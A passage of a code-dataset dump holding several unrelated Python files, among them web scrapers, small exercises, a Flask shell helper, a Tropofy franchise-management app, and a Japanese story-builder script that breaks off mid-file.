'location-review-review-list-parts-ReviewRatingFilter__row_num--3cSP7'}\n )\n\n if not reviews:\n reviews = soup.find_all('span', {'class': 'eqh_0ztw'})\n\n except AttributeError:\n self.reviews = []\n\n else:\n self.reviews = reviews\n\n def get_attractie(self, headless: bool):\n self.from_link(headless=headless)\n\n self.find_coords()\n self.find_title()\n self.find_aantal_reviews()\n self.find_rating()\n self.find_adres_straat()\n self.find_country()\n self.find_plaats()\n self.find_postcode()\n self.find_ta_id()\n self.find_reviews()\n","sub_path":"tripadvisor/scrape_3.py","file_name":"scrape_3.py","file_ext":"py","file_size_in_byte":10257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"46146796","text":"text = input(\"Text: \")\nword_list = text.split()\ni = 0\nmax_word_length = 0\nword_group = {}\nfor words in word_list:\n words = words.lower()\n if words in word_group:\n word_group[words] += 1\n else:\n word_group[words] = 1\n if len(words) > max_word_length:\n max_word_length = len(words)\nordered_word_list = list(word_group.keys())\nordered_word_list.sort()\n\nfor words in ordered_word_list:\n print(\"{:{}} : {}\".format(words, max_word_length, word_group[words]))\n\n","sub_path":"prac_05/word_occurrences.py","file_name":"word_occurrences.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"457383343","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom bs4 import BeautifulSoup\nfrom selenium.webdriver.firefox.options import Options\n\n\nurl = 'https://www.oddsportal.com/soccer/africa/africa-cup-of-nations-2008/cameroon-egypt-I1u1cV7k/'\noptions = Options()\noptions.headless = False\n\nbrowser = webdriver.Firefox(options=options)\nbrowser.get(url)\ninitial_odd_data = browser.find_elements_by_css_selector('td.right.odds')\nprint(initial_odd_data)\n\nhov = ActionChains(browser).move_to_element(initial_odd_data[6])\nhov.perform()\nrequiredHtml = browser.page_source\nsoup = BeautifulSoup(requiredHtml, 'html.parser')\nhelp_box = soup.select('span.help')[0].text\nprint(help_box)\n\n\n","sub_path":"get_onmouse.py","file_name":"get_onmouse.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"600794622","text":"class Train:\n\n def __init__(self, num_cars):\n self.num_cars = num_cars\n\n def __repr__(self):\n return \"{} car train\".format(self.num_cars)\n\n def __len__(self):\n print(self.num_cars)\n\n\n# gajayana = Train(4)\n# print(gajayana)\n# len(gajayana)\n\n\ndef is_even(k):\n return k & 1 == 0\n\n\ndef is_multiple(n, m):\n return n == m * int(n / m)\n\n\nprint(is_multiple(4, 4))\n\n\ndef yes_or_no():\n count = 1\n while count < 100:\n if count % 2 == 1:\n yield \"yes\"\n else:\n yield \"no\"\n count += 1\n\n\ngen = yes_or_no()\nprint(next(gen))\nprint(next(gen))\nprint(next(gen))\n\n\ndef get_multiples(number=0, count=10):\n if number == 0 and count == 10:\n for x in range(1, count + 1):\n yield x\n else:\n for y in range(1, count + 1):\n yield number * y\n\n\ndefault_get_multiple = get_multiples()\ncustom_get_multiple = get_multiples(2, 3)\nprint(list(default_get_multiple))\nprint(list(custom_get_multiple))\n\n\ndef get_unlimited_multiples(nums=1):\n count = 1\n while True:\n yield nums * count\n count += 1\n\n\nsevens = get_unlimited_multiples(7)\nl7 = [next(sevens) for i in 
range(15)]\nprint(l7)\n\n\n# [7, 14, 21, 28, 35, 42, 49, 56, 63, 70, 77, 84, 91, 98, 105]\n\n\ndef adjacentElementsProduct(inputArray):\n result = -1000\n tmp = -1000\n if isinstance(inputArray, list):\n for x in range(len(inputArray) - 1):\n temp = inputArray[x:x+2]\n tmp = max(temp[0] * temp[1], tmp)\n result = tmp\n return result\n\n\nprint(adjacentElementsProduct([-23, 4, -3, 8, -12]))\n\n\n","sub_path":"section26oopPart2/trainsExercise.py","file_name":"trainsExercise.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"349349512","text":"afstandkm = int(input('Voer de afstand van uw reis in: '))\nleeftijd = int(input('Voer uw leeftijd in: '))\nweekend = input('Is het weekend? ')\n\ndef standaardprijs(afstandkm): #Bepaal de standaard prijs op basis van de reisafstand\n if afstandkm > 0:\n if afstandkm >= 50:\n return afstandkm * 0.60 + 15 #15 starttarief, €0,60 per KM\n else:\n return afstandkm * 0.80 #€0,80 per KM\n\n else:\n return 0\n\ndef ritprijs(leeftijd, weekend, afstandkm): #Bepaal de uiteindelijke prijs op basis van het feit of het weekend is, de reisafstand en de leeftijd.\n\n prijs=standaardprijs(afstandkm)\n\n if weekend.lower() == \"ja\": #Converteer string naar boolean\n isweekend = True\n else:\n isweekend = False\n\n if leeftijd < 12 or leeftijd >= 65: #Leeftijd check voor korting.\n if isweekend: #Korting voor 12- en 65+. Extra korting voor weekendritten.\n return prijs * 0.65 #30% koritng\n else:\n return prijs * 0.70 #35% koritng\n\n else:\n if isweekend: #Korting voor weekendritten\n return prijs * 0.60 #40% korting\n else:\n return prijs\n\nprint(ritprijs(leeftijd, weekend, afstandkm))\n","sub_path":"FA3.py","file_name":"FA3.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"73671197","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n\n\nfig_1 = plt.figure(num = 1)\nax_1 = Axes3D(fig_1)\n\nfig_2 = plt.figure(num = 2)\nax_2 = Axes3D(fig_2)\n\n# X, Y value\nX = np.linspace(-3, 3, 40)\nY = np.linspace(-3, 3, 40)\nX, Y = np.meshgrid(X, Y)\nprint(X.shape, Y.shape)\n\n# height value\nZ_1 = np.abs(X) + np.abs(Y)\nZ_2 = np.square(X) + np.square(Y)\n\nax_1.plot_surface(X, Y, Z_1, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))\nax_2.plot_surface(X, Y, Z_2, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))\n\nax_1.contourf(X, Y, Z_1, zdir='z', offset = -0.1, cmap=plt.get_cmap('rainbow'))\nax_2.contourf(X, Y, Z_2, zdir='z', offset = -0.1, cmap=plt.get_cmap('rainbow'))\n\nplt.show()\n\nmain_path = os.getcwd() + '/'\nfig_1.savefig(main_path + '3d_L1.png', dpi = 1080)\nfig_2.savefig(main_path + '3d_L2.png', dpi = 1080)\n","sub_path":"vis_losses_3d.py","file_name":"vis_losses_3d.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"364804996","text":"import plotly.express as px\r\nimport pandas\r\ngame = \"pubg\"\r\npath = \"C:/Users/Usuario/Documents/Visual Studio Code/dashboard/game_popularity/popularity_en/{}.csv\".format(game)\r\npop = pandas.read_csv(path)\r\niso = pandas.read_csv(\"C:/Users/Usuario/Documents/Visual Studio Code/dashboard/game_popularity/countries_iso_rectified.csv\")\r\niso_dic = {} #dicionário que relaciona os países a seus códigos iso\r\n\r\nfor i in range(252):\r\n 
iso_dic[iso.Country[i]] = iso.ISO[i]\r\n\r\niso_column = [] #coluna com códigos iso, eles aparecerão na mesma ordem que os países em pop \r\n\r\nfor country in pop.Country:\r\n iso_column.append(iso_dic[country])\r\n\r\niso_df = pandas.DataFrame(iso_column, columns=[\"ISO\"])\r\n\r\ndf = pandas.concat([pop, iso_df], axis=1) #concatenar horizontalmente os dois dataframes\r\n\r\n\r\nfig = px.choropleth(df, locations=\"ISO\",\r\n color=\"Popularity\",\r\n hover_name=\"Country\",\r\n color_continuous_scale=px.colors.sequential.Plasma)\r\nfig.show()\r\n","sub_path":"game_popularity/game_popularity_heatmap.py","file_name":"game_popularity_heatmap.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"98295881","text":"# -*- coding:utf-8 -*-\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import * # datasets, layers, optimizers(优化器), Sequential(容器), metrics(测试器)\n\n# 数据预处理\ndef preprocess(x,y):\n\tx = tf.cast(x,tf.float32)/255.0\n\ty = tf.cast(y,tf.int32)\n\treturn x,y\n\n# 加载数据\n(x, y), (x_test, y_test) = datasets.fashion_mnist.load_data()\nprint(x.shape, y.shape)\n\n# batch size\nbatchsz = 128\n\n# 将数据切片\ndb = tf.data.Dataset.from_tensor_slices((x,y))\n# 将数据进行预处理并且打乱,然后打包成一个batchsize为128的可迭代对象db\ndb = db.map(preprocess).shuffle(10000).batch(batchsz)\n\ndb_test = tf.data.Dataset.from_tensor_slices((x_test,y_test))\ndb_test = db_test.map(preprocess).shuffle(10000).batch(batchsz)\n\nmodel = Sequential([ # 容器包含五个全连接层\n\tlayers.Dense(256,activation = tf.nn.relu), # 全连接层 [b, 784] => [b, 256]\n\tlayers.Dense(128, activation=tf.nn.relu), # [b, 256] => [b, 128]\n\tlayers.Dense(64, activation=tf.nn.relu), # [b, 128] => [b, 64]\n\tlayers.Dense(32, activation=tf.nn.relu), # [b, 64] => [b, 32]\n\tlayers.Dense(10)] # [b, 32] => [b, 10], 330 = 32*10 + 10\n)\nmodel.build(input_shape = [None, 28*28])\nmodel.summary()\n# 优化器\noptimizer = optimizers.Adam(lr=1e-3)\n\ndef main():\n\tfor epoc in range(30):\n\t\tfor step,(x,y) in enumerate(db):\n\t\t\t# x:[b,28,28] --> [b,784]\n\t\t\t# y:[b]\n\t\t\tx = tf.reshape(x,[-1,28*28])\n\t\t\twith tf.GradientTape() as tape:\n\t\t\t\t# [b,784] --> [b,10]\n\t\t\t\tlogits = model(x)\n\t\t\t\ty_onehot = tf.one_hot(y,depth = 10)\n\t\t\t\t# [b]\n\t\t\t\tloss_mes = tf.reduce_mean(tf.losses.MSE(y_onehot,logits)) # MES = mean square error\n\t\t\t\tloss_ce = tf.reduce_mean(tf.losses.categorical_crossentropy(y_onehot,logits,from_logits = True))\n\t\t\tgrads = tape.gradient(loss_ce,model.trainable_variables)\n\t\t\toptimizer.apply_gradients(zip(grads,model.trainable_variables))\n\n\t\t\tif step%100 == 0:\n\t\t\t\tprint(epoc,step,'loss:',float(loss_mes),float(loss_ce))\n\n\t\ttotal_correct = 0\n\t\ttotal_num = 0\n\t\tfor x,y in db_test:\n\t\t\t# x:[b,28,28] --> [b,784]\n\t\t\t# y:[b]\n\t\t\tx = tf.reshape(x, [-1, 28 * 28])\n\n\t\t\tlogits = model(x)\n\t\t\t# logits --> prob\n\t\t\tprob = tf.nn.softmax(logits,axis=1)\n\t\t\tpred = tf.cast(tf.argmax(prob,axis=1),tf.int32)\n\n\t\t\t# pred:[b]\n\t\t\t# y : [b]\n\t\t\t# correct : [b], True:equal Flase:unequal\n\t\t\tcorrect = tf.equal(y,pred)\n\t\t\tcorrect = tf.reduce_sum(tf.cast(correct,tf.int32))\n\n\t\t\ttotal_correct += int(correct)\n\t\t\ttotal_num += x.shape[0]\n\n\t\tacc = total_correct / total_num\n\t\tprint(acc)\nif __name__ == 
'__main__':\n\tmain()\n\n\n\n","sub_path":"fashionmnist实战.py","file_name":"fashionmnist实战.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"483282044","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\n\nimport requests\n\nfrom config import ID_KEY, SECRET_KEY\n\n\nclass Localisation:\n \"\"\"this class gather all the fonctions needed for the program\"\"\"\n\n def run(self, text=\"ou se trouve la tours eiffel\"):\n \"\"\"run the program\"\"\"\n result = {}\n question = self.parser(text)\n geoloc, address = self.map_api(question, \"48.8482,2.3724;r=245799\")\n result[\"here\"] = geoloc\n result[\"address\"] = address\n wiki = self.wiki_api(geoloc)\n result[\"wiki\"] = wiki\n result[\"status\"] = \"true\"\n return result\n\n def parser(self, text):\n \"\"\"parse the input text and extract the place researched \"\"\"\n regex = r\"(ou se trouve|comment s'appelle|adresse|situe| \\\n trouve )(\\s+)(?P.*\\b)?\"\n test_str = text\n matches = re.finditer(regex, test_str)\n for r in matches:\n print(r.group(\"question\"))\n return r.group(\"question\")\n\n def map_api(self, name, zone):\n \"\"\"send a request to the HERE API for the search's coordinates\"\"\"\n session = requests.Session()\n url = \"https://places.demo.api.here.com/places/v1/discover/search\"\n params = {\n \"app_code\": SECRET_KEY,\n \"app_id\": ID_KEY,\n \"in\": zone,\n \"pretty\": \"True\",\n \"q\": name,\n \"result_types\": \"place\"\n }\n request = session.get(url=url, params=params)\n data = request.json()\n address = data[\"results\"][\"items\"][0][\"vicinity\"]\n address = address.replace(\"
<br/>
\", \" \")\n data = data[\"results\"][\"items\"][0][\"position\"]\n data = [str(data[0]), str(data[1])]\n return data, address\n\n def wiki_api(self, localisation):\n \"\"\"send a request to the Wikipedia API to find\n info about a localisation\"\"\"\n session = requests.Session()\n url = \"https://fr.wikipedia.org/w/api.php\"\n localisation = str(localisation[0])+\"|\"+str(localisation[1])\n params = {\n \"format\": \"json\",\n \"generator\": \"geosearch\",\n \"prop\": \"coordinates|pageimages|extracts|info\",\n \"inprop\": \"url\",\n \"pithumbsize\": 144,\n \"ggscoord\": localisation,\n \"ggslimit\": \"5\",\n \"ggsradius\": \"10000\",\n \"action\": \"query\",\n \"exintro\": \"True\",\n \"explaintext\": \"True\",\n }\n request = session.get(url=url, params=params)\n data = request.json()\n places = data['query']['pages']\n results = []\n for k in places:\n title = places[k]['title']\n abstract = places[k]['extract']\n thumbnail = places[k]['thumbnail']['source'] if \\\n \"thumbnail\" in places[k] else ''\n article_url = places[k]['fullurl']\n place_loc = (places[k]['coordinates'][0]['lat'],\n places[k]['coordinates'][0]['lon'])\n results.append({\n 'title': title,\n 'abstract': abstract,\n 'thumbnail': thumbnail,\n 'articleUrl': article_url,\n 'localisation': place_loc})\n return results\n\n\nif __name__ == \"__main__\":\n app = Localisation()\n app.run()\n","sub_path":"parser_man.py","file_name":"parser_man.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"496808900","text":"import numpy as np\nimport tensorflow as tf\n#import edward as ed\n\n\n#from edward.models import Normal\nfrom scipy.stats import multivariate_normal, norm\n\nclass MixDiagGaussian(object):\n def __init__(self,means,stds,weights,dim):\n self.components = self.gen_components(means,stds,dim)\n self.means = means\n self.stds = stds\n self.weights = weights\n self.dim = dim\n\n def gen_components(self,means,stds,dim):\n components = []\n if dim > 1:\n for m,s in zip(means,stds):\n #print('check component',m,s)\n dist = multivariate_normal(mean=np.ones(dim)*m,cov=np.ones(dim)*s)\n components.append(dist)\n else:\n dist = norm(loc=m,scale=s)\n components.append(dist)\n return components\n\n def log_prob(self,x):\n return np.log(self.prob(x))\n \n def prob(self,x):\n cp = 0.\n for w,c in zip(self.weights,self.components):\n #print('check x',x[0])\n #print('check c parm',sess.run(c.loc))\n #print('check c prob',np.sum(sess.run(c.prob(x))==0.))\n cp += w * c.pdf(x)\n '''\n p = cp[:,0]\n \n for d in range(1,self.dim):\n p += cp[:,d]\n #lp = tf.log(p[0])\n print('check logp',sess.run(p))\n '''\n return cp\n\n def sample(self,size=1):\n ids = np.random.choice(len(self.weights),size=size,p=self.weights)\n ss = np.zeros([size,self.dim],dtype=np.float32)\n for i in range(len(self.weights)):\n idx = ids==i\n ss[idx] = np.random.normal(loc=self.means[i],scale=self.stds[i],size=(int(np.sum(idx)),self.dim)).astype(np.float32)\n #print(ss[:5])\n return ss ","sub_path":"base_models/mixture_models.py","file_name":"mixture_models.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"2105468","text":"import time\n\n\nclass Condition(object):\n '''\n API操作功能组合\n '''\n\n def __init__(self,conf):\n self.conf = conf\n self.wx = conf.ui.Weixin(conf)\n #self.ADMIN_LC = conf.admin.LOCATOR\n self.SHOP_PARAM = conf.param.Shop\n self.Utils = conf.Utils\n\n 
def add_a_second_kill_act(self):\n pass\n\n def add_a_product(self,param=None,onsale=True):\n '''\n 添加一个商品,默认上架\n '''\n pd = self.conf.api.Shop(self.conf)\n if param == None:\n param = self.SHOP_PARAM(self.conf).product_add()\n resp = pd.product_add(param)\n product_id = resp['errmsg']['product']['id']\n print(\"ProductID:\",product_id)\n if onsale:\n payload = {\"ids\":[product_id]}\n pd.product_on_sale(payload)\n return product_id\n\n def del_a_product(self,id):\n '''\n 删除一个商品\n '''\n pd = self.conf.api.Shop(self.conf)\n payload = {\"ids\":[id]}\n pd.product_del(payload)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Test/wkd/lib/combo/condition.py","file_name":"condition.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"405357009","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nShell context functions.\n'''\nimport os\nimport shutil\nimport click\nfrom flask import current_app\nfrom flask.cli import with_appcontext\nfrom bloggins.database import models\n\n\n@with_appcontext\ndef routes():\n ''' Get Flask app routes.'''\n routes = []\n click.echo('Getting routes..')\n for rule in current_app.url_map.iter_rules():\n route = 'uri: {rule} <> .name: {endpoint} <> methods: {methods}'\n routes.append(route.format(\n rule=rule,\n endpoint=rule.endpoint,\n methods=rule.methods))\n for route in routes:\n print(route)\n return\n\n\n@with_appcontext\ndef clean(root=None, matches=['.pyc', '__pycache__']):\n '''Recursively delete files and or directories matching pattern.\n\n Args:\n root :: str, root file path to begin recursion\n matches :: list or str, patterns to check against\n '''\n if root is None:\n root = os.path.dirname(current_app.root_path)\n\n if not isinstance(matches, list):\n matches = [matches]\n\n for obj in os.listdir(root):\n path = os.path.join(root, obj)\n for pattern in matches:\n if pattern in obj:\n click.echo(\"Deleting: {path}\".format(path=path))\n if os.path.isdir(path):\n shutil.rmtree(path)\n else:\n os.remove(path)\n break\n else:\n if os.path.isdir(path):\n clean(path, matches)\n\n\n@with_appcontext\ndef seed():\n '''Seed the database with some data'''\n click.echo('Seeding the database with posts and tags..')\n models.Entry.seed(20)\n models.Tag.seed(3)\n","sub_path":"bloggins/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"2117895","text":"from simplekml import Kml\r\n\r\nfrom sqlalchemy.schema import Column, ForeignKeyConstraint, UniqueConstraint\r\nfrom sqlalchemy.types import Float, Integer, Text\r\n\r\nfrom tropofy.app import AppWithDataSets, Step, StepGroup\r\nfrom tropofy.database.tropofy_orm import DataSetMixin\r\nfrom tropofy.widgets import Chart, KMLMap, SimpleGrid\r\n\r\n\r\ndef make_step_group(name, steps):\r\n \"\"\"Make group where steps are an array of tuples with name, widgets.\"\"\"\r\n step_group = StepGroup(name=name)\r\n for step in steps:\r\n step_name, step_widgets = step\r\n step_group.add_step(Step(name=step_name, widgets=step_widgets))\r\n return step_group\r\n\r\n\r\nclass StoreExpensesPieChart(Chart):\r\n def get_chart_type(self, app_session):\r\n return Chart.PIECHART\r\n\r\n def get_table_schema(self, app_session):\r\n return {\r\n 'store': ('string', 'Store'),\r\n 'expenses': ('number', 'expenses'),\r\n }\r\n\r\n def get_table_data(self, app_session):\r\n results = []\r\n stores = 
app_session.data_set.query(Store).all()\r\n for store in stores:\r\n performances = app_session.data_set.query(\r\n Performance).filter_by(store_name=store.name).all()\r\n results.append({\r\n 'store': store.name,\r\n 'expenses': sum(p.expenses for p in performances)\r\n })\r\n return results\r\n\r\n def get_column_ordering(self, app_session):\r\n return ['store', 'expenses']\r\n\r\n def get_chart_options(self, app_session):\r\n total_expense = sum(\r\n p.expenses for p in app_session.data_set.query(Performance).all()\r\n )\r\n title = 'Company Expenses: Total = ${expense}'.format(\r\n expense=str(total_expense))\r\n return {'title': title}\r\n\r\n\r\nclass PeformanceBarChart(Chart):\r\n def get_chart_type(self, app_session):\r\n return Chart.BARCHART\r\n\r\n def get_table_schema(self, app_session):\r\n return {\r\n 'year': ('string', 'Year'),\r\n 'sales': ('number', 'Sales'),\r\n 'expenses': ('number', 'expenses'),\r\n }\r\n\r\n def get_table_data(self, app_session):\r\n results = []\r\n years = [\r\n year for row in\r\n app_session.data_set.query(Performance.year).distinct()\r\n for year in row\r\n ]\r\n for year in years:\r\n performances = app_session.data_set.query(\r\n Performance).filter_by(year=year)\r\n results.append({\r\n 'year': year,\r\n 'sales': sum(p.sales for p in performances),\r\n 'expenses': sum(p.expenses for p in performances)\r\n })\r\n return results\r\n\r\n def get_column_ordering(self, app_session):\r\n return ['year', 'sales', 'expenses']\r\n\r\n def get_order_by_column(self, app_session):\r\n return 'year'\r\n\r\n def get_chart_options(self, app_session):\r\n return {\r\n 'title': 'Company Performance',\r\n 'vAxis': {\r\n 'title': 'year',\r\n 'titleTextStyle': {'color': 'red'}\r\n }\r\n }\r\n\r\n\r\nclass Store(DataSetMixin):\r\n name = Column(Text, nullable=False)\r\n latitude = Column(Float, nullable=False)\r\n longitude = Column(Float, nullable=False)\r\n\r\n @classmethod\r\n def get_table_args(cls):\r\n return (UniqueConstraint('name', 'data_set_id'),)\r\n\r\n\r\nclass Performance(DataSetMixin):\r\n store_name = Column(Text, nullable=False)\r\n year = Column(Integer, nullable=False)\r\n sales = Column(Float, nullable=False, default=0)\r\n expenses = Column(Float, nullable=False, default=0)\r\n\r\n @classmethod\r\n def get_table_args(cls):\r\n return (\r\n UniqueConstraint(\r\n 'store_name',\r\n 'year',\r\n 'data_set_id'\r\n ),\r\n ForeignKeyConstraint(\r\n ['store_name', 'data_set_id'],\r\n ['store.name', 'store.data_set_id'],\r\n ondelete='CASCADE',\r\n onupdate='CASCADE',\r\n ),\r\n )\r\n\r\n\r\nclass MyKMLMap(KMLMap):\r\n def get_kml(self, app_session):\r\n kml = Kml()\r\n stores = app_session.data_set.query(Store).all()\r\n for store in stores:\r\n kml.newpoint(\r\n name=store.name,\r\n coords=[(store.longitude, store.latitude)]\r\n )\r\n return kml.kml()\r\n\r\n\r\nclass Application(AppWithDataSets):\r\n def get_name(self):\r\n return 'Franchise Management'\r\n\r\n def get_examples(self):\r\n return {'Demo Data for Brisbane North': self.load_example_data}\r\n\r\n def get_gui(self):\r\n step_groups = []\r\n\r\n step_groups.append(\r\n make_step_group('Input', [\r\n ('Stores', [SimpleGrid(Store)]),\r\n ('Performances', [SimpleGrid(Performance)])\r\n ])\r\n )\r\n\r\n step_groups.append(\r\n make_step_group('Output', [\r\n ('Viz', [\r\n {'widget': PeformanceBarChart(), 'cols': 6},\r\n {'widget': StoreExpensesPieChart(), 'cols': 6},\r\n {'widget': MyKMLMap(), 'cols': 12}\r\n ])\r\n ])\r\n )\r\n\r\n return step_groups\r\n\r\n @staticmethod # to ensure self 
does not get passed in\r\n def load_example_data(app_session):\r\n app_session.data_set.add_all([\r\n Store(name=\"CLAYFIELD\", latitude=-27.417536, longitude=153.056677),\r\n Store(name=\"SANDGATE\", latitude=-27.321538, longitude=153.069267)\r\n ])\r\n\r\n app_session.data_set.add_all([\r\n Performance(\r\n store_name=\"CLAYFIELD\", year=2011, sales=1000, expenses=400),\r\n Performance(\r\n store_name=\"CLAYFIELD\", year=2012, sales=1170, expenses=460),\r\n Performance(\r\n store_name=\"SANDGATE\", year=2011, sales=660, expenses=1120),\r\n Performance(\r\n store_name=\"SANDGATE\", year=2012, sales=1030, expenses=540),\r\n ])\r\n","sub_path":"te_starter/starter.py","file_name":"starter.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"466357417","text":"\"\"\" Problem 16\n2 ** 15 = 32768 and the sum of its digits is 3 + 2 + 7 + 6 + 8 = 26.\nWhat is the sum of the digits of the number 2 ** 1000?\nhttps://projecteuler.net/problem=16 \"\"\"\n\n\ndef pds(p):\n s, n = 0, 2 ** p\n\n while n:\n s, n = s + n % 10, n // 10\n\n return s\n\nprint(pds(1000))\n","sub_path":"1_to_100/11_to_20/016_power_digit_sum.py","file_name":"016_power_digit_sum.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"38169183","text":"\"\"\"\nGiven two non-negative values, print true if they have the same last digit, such as with 27 and 57.\nlastDigit(7, 17) → true \nlastDigit(6, 17) → false\nlastDigit(3, 113) → true\n\"\"\"\n\n\nnum1=int(input('Enter num1 - '))\nnum2=int(input('enter num2 - '))\n\nif(num1>=0 and num2>=0):\n num1=num1%10\n num2=num2%10\n\n if(num1==num2):\n print('true')\n else:\n print('false')\n \n\n \n","sub_path":"python prog/pythonFudamentalsNew/prog_3_last_digit_same.py","file_name":"prog_3_last_digit_same.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"183874246","text":"# -*- coding: utf-8 -*-\n\"\"\"Episode: 3-3.蜘蛛のスレッド/蜘蛛の糸\n\"\"\"\n## path\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '../..'))\nsys.path.append('storybuilder')\n## local libs\nfrom storybuilder.builder.world import World\nfrom storybuilder.builder.writer import Writer\n\n\n## define alias\nW = Writer\n_ = W.getWho()\n\n\n## scenes\ndef sc_noplot(w: World):\n sana, noto = W(w.sana), W(w.noto)\n cat = W(w.mascat)\n door = W(w.door)\n return w.scene(\"プロットはない\",\n sana.come(\"#数日後、再び先生宅を訪れる\"),\n sana.explain(\"それからも$Sは用事がある日を除き、毎日のように先生のアパートを訪れた\",\n \"スマートフォンを持っていないから連絡が取りづらい、という事情もあったが、\",\n \"それ以上にまだ全然信用も信頼も得られていない状態では今後も担当として仕事していくことは相当厳しいだろう\",\n \"まずは何でも良いので、作家と編集という関係を構築したい\"),\n sana.think(\"そんな思いで玄関のドアを開けて入る度に笑顔で「先生、原稿を」と口にするのだけれど、\"),\n noto.talk(\"ない\"),\n sana.think(\"返される低い声はいつも同じだ\"),\n sana.talk(\"先生\"),\n noto.talk(\"ない\"),\n sana.think(\"そのうちにやり取りも短くなり、どんどん洗練され、最終的にはドアを開けた瞬間に「ない」と言われるまでになった\",\n \"やっとここまで来たか、と自分のことながら呆れていたけれど、流石にこれ以上はもうどうなることもないだろうと楽観視して、この日、先生のアパートを訪れた\"),\n sana.talk(\"え……\"),\n door.look(\"それはドアの前だった\",\n \"原稿を千切ったものが裏側にしてテープで貼り付けられており、そこに『原稿はない!』と書かれていたのだ\"),\n sana.think(\"そういえばアパートを訪れた初日にも同じようなことがあったなと思い出してそれを剥ぎ取ると、\",\n \"一度インタフォンを押してから「入りますよー」と声を掛けて合鍵を使う\"),\n sana.talk(\"先生、あと何日か分かってるんですか?\"),\n noto.do(\"自然と合鍵を使って入ってくるようになった$CSの姿に一瞬先生はぎょっとした視線を向けたが、\",\n \"諦めたように読んでいた新聞を置くと、溜息混じりにこう言った\"),\n noto.talk(\"毎日来なくてもいいよ。分かってるから\"),\n 
sana.do(\"確かに壁に掛けられた大きな十月のカレンダーの最終日に赤丸が書かれている\",\n \"その右上の愛らしい『締切です』の文字はおそらく$fukayaのものだろう\"),\n sana.talk(\"先生はスマートフォンとか、せめてガラケーでもいいんですけど、持つ気はないんですか?\"),\n noto.talk(\"君は電話会社の営業か何かかね?\",\n \"持つ気のない人間に対して持てと言うのは、苦手なタコをいいから食えと目の前に突き出されるようなものだよ\"),\n sana.talk(\"先生タコが苦手なんですか?\"),\n sana.think(\"それは$fukayaの引き継ぎメモにはない情報だった\"),\n sana.talk(\"アレルギィがあるなら分かりますけど、別にコリコリした食感くらいで味も臭いもそんなに独特とは思いませんが\"),\n noto.talk(\"好きな人間は得てして気にならないものだよ\",\n \"ほら、よく犬や猫好きが言うだろう?\", \"全然臭くないですよ、寧ろ良い匂いです\", \"とか\",\n \"でもそうではない人間からすれば、あれは臭い\", \"ペットを屋内で飼っている人間は自分たちまでその臭いに染まっていることに気づいていないんだよ\"),\n sana.talk(\"でも先生、猫飼ってるじゃないですか\"),\n cat.be(),\n cat.do(\"太めの黒猫は満足したお腹で今、部屋の隅のストライプ柄のクッションの上で丸まっていた\"),\n noto.talk(\"あれは飼ってるんじゃない\", \"たまに遊びに来ているだけだ\"),\n sana.talk(\"はぁ\"),\n sana.think(\"まだ出会って一週間ほどなのに、既にその理屈っぽさと回りくどい言い回し、おまけにその頑固さという、引き継ぎメモでは全く触れられていない彼の人間性というものを、\",\n \"$Sは理解し始めていた\"),\n sana.talk(\"じゃあタコは差し入れしないように注意しますね\",\n \"それよりスマートフォンを購入しましょう、先生\",\n \"初めてならきっと割安で手に入りますよ\", \"先生なら電話だけでしょうから、一番安いプランで大丈夫ですし\"),\n noto.talk(\"スマートフォン?\",\n \"大体スマートの意味を君たちは理解しているのか?\",\n \"あの板状の機械のどこが賢いというのかね?\", \"元々は電話に機能が付いたものだったのに今や何だね、あれは、もう菓子付き玩具もびっくりの本末転倒なくらい電話の存在感がないじゃないか\",\n \"君は知らないだろうが半世紀前までまだ交換手が線を繋ぐのが普通だったんだ\",\n \"こう、ダイヤルを回してだね……\"),\n sana.talk(\"そういう電話が良いなら大正時代にでも転生してください\"),\n noto.talk(\"大正じゃない\", \"昭和だよ\"),\n sana.do(\"流石に言葉を使う職業をしているだけあって、簡単には折れてくれない\"),\n 